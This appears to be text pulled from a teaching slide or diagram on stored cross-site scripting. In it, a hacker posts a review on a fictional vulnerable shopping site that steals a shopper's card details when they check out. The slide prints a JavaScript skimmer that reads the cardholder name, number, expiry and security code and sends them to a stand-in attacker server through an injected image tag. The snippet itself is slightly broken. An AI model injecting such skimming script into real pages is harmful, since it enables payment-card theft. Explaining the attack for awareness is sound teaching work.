Customer reviews
Hacker Alice 
Server 
Internet 
Database 
MaliciousServer
http://a-xss-vulnerable-shopping-site.com/item/12345/review
http://a-xss-vulnerable-shopping-site.com/item/12345/buy
Customer reviews
Cardholder Name Card number Expiration date Security code
L@@K HERE!
<script>
// send card information to the hacker when user submits!
$('form').submit = function () {
var name = $('input[name="cardholder-name"]').value,
card = $('input[name="card-no"]').value,
date = $('input[name="expiration-date"]').value,
code = $('input[name="security-code"]').value;
$("body").insertAdjacentHTML("beforeend",
'<img src="http://the-hacker-server.com/?name="' + name
+ "&card=" + card + "&date=" + date + "&code=" + code + '>');
}
</script>
Cross-site Scripting
Hacker injects some JavaScript code
into the vulnerable website...
When Alice visits the page...
--:--